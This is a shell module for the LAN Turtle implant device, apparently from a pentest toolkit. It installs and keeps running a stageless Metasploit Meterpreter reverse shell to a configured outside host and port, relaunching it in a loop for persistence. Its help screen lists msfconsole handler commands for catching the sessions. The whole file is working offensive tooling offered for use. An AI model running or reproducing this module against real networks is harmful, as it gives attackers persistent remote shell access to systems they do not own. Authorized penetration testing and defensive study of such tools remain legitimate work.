#!/bin/bash /usr/lib/turtle/turtle_module
VERSION="1.0"
DESCRIPTION="Stageless Metasploit payload to maintain shells"
CONF=/tmp/meterpreter_sl.form
AUTHOR=IMcPwn

: ${DIALOG_OK=0}
: ${DIALOG_CANCEL=1}
: ${DIALOG_HELP=2}
: ${DIALOG_EXTRA=3}
: ${DIALOG_ESC=255}

function start {
  if [ -s /etc/config/meterpreter_sl ]
  then
    if [ -x /etc/turtle/meterpreter/meterpreter_sl_exec ]
    then
        echo "/etc/turtle/meterpreter/meterpreter_sl_exec" | at now
        echo "Stageless Meterpreter started with pid:"
        pidof meterpreter_sl
    else
        mkdir /etc/turtle/meterpreter
        rm /etc/turtle/meterpreter/meterpreter_sl_exec
        touch /etc/turtle/meterpreter/meterpreter_sl_exec
        chmod +x /etc/turtle/meterpreter/meterpreter_sl_exec

echo '''#!/bin/bash
rm /tmp/killmeterpreter_sl
DATE=$(date)
IP=$(uci get meterpreter_sl.host)
PORT=$(uci get meterpreter_sl.port)
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
[[ "$IP" == "" || "$PORT" == "" ]] && {
logger "Stageless Meterpreter: Error, configuration blank"
echo "Stagelss Meterpreter: Error, configuration blank"
} || {
while [ ! -f /tmp/killmeterpreter_sl ]; do
echo "Started Stageless Meterpreter at $DATE with $IP $PORT"
logger "Stageless Meterpreter: Started at $DATE with $IP $PORT"
/usr/bin/meterpreter_sl $IP $PORT
done
rm /tmp/killmeterpreter_sl
echo "Stopped Stageless Meterpreter at $DATE with $IP $PORT"
logger "Stageless Meterpreter: Stopped at $DATE with $IP $PORT"
}''' > /etc/turtle/meterpreter/meterpreter_sl_exec

        echo "/etc/turtle/meterpreter/meterpreter_sl_exec" | at now
        echo "Stageless Meterpreter started with pid:"
        pidof meterpreter_sl
    fi
 else
    echo "Stageless Meterpreter not configured"
  fi
}

function stop {
  touch /tmp/killmeterpreter_sl
  kill $(ps | grep -w [/]usr/bin/meterpreter_sl | awk {'print $1'})
}

function status {
  if ps | grep -w -q [/]usr/bin/meterpreter_sl; then echo "1"; else echo "0"; fi
}

function configure {
  if [ -s /etc/config/meterpreter_sl ]
  then
    meterpreter_sl_host=$(uci get meterpreter_sl.host)
    meterpreter_sl_port=$(uci get meterpreter_sl.port)
  fi

  dialog --ok-label "Submit" \
    --help-button \
    --title "Stageless Meterpreter Configuration" \
    --form "Stageless Meterpreter (Metasploit Module)\n\n\
Enter the Host and Port of the target stageless meterpreter listener.\n \n" 14 60 2\
    "Listen Host:"	1 1	"$meterpreter_sl_host"	1 14 48 0 \
    "Listen Port:"	2 1	"$meterpreter_sl_port"	2 14 48 0 \
  2>$CONF

  return=$?

  case $return in
    $DIALOG_OK)
      cat $CONF | { 
        read -r meterpreter_sl_host
        read -r meterpreter_sl_port
        touch /etc/config/meterpreter_sl
        uci set meterpreter_sl.host="$meterpreter_sl_host"
        uci set meterpreter_sl.port="$meterpreter_sl_port"
        uci commit meterpreter_sl
        rm $CONF
        clear
      };;

    $DIALOG_HELP)
      dialog --title "Help" \
        --msgbox "\
Host - IP or Hostname of target stageless meterpreter listener\n\
Port - Port number of target stageless meterpreter listener\n \n\
     ,__,              For more Metasploit and Meterpreter Insight \n\
     (oo)___           Watch Metasploit Minute with Mubix on Hak5!\n\
     (__)    )\\        http://www.MetasploitMinute.com \n\
        ||--|| *\n \n\
Basic Metasploit Tips for Meterpreter Setup:\n \n\

use exploit/multi/handler               \n\
# Handles multiple meterpreter sessions\n \n\

set PAYLOAD php/meterpreter_reverse_tcp \n\
# Setting for Stageless Reverse TCP Meterpreter\n \n\

set LHOST [host or ip]                  \n\
# Hostname or IP of listener\n \n\

set LPORT [port number]                 \n\
# Port of listener\n \n\

set ExitOnSession false                 \n\
# Let the exploit continue when meterpreter exists\n \n\

exploit -j                              \n\
# Make the exploit a backgroundable job\n \n\

sessions                                \n\
# Lists sessions\n \n\

sessions -i [number]                    \n\
# Interacts with session number\n \n\
" 20 74
      configure
      ;;
    $DIALOG_CANCEL)
      rm $CONF
      clear
      exit;;
    $DIALOG_ESC)
      clear;;
  esac
}
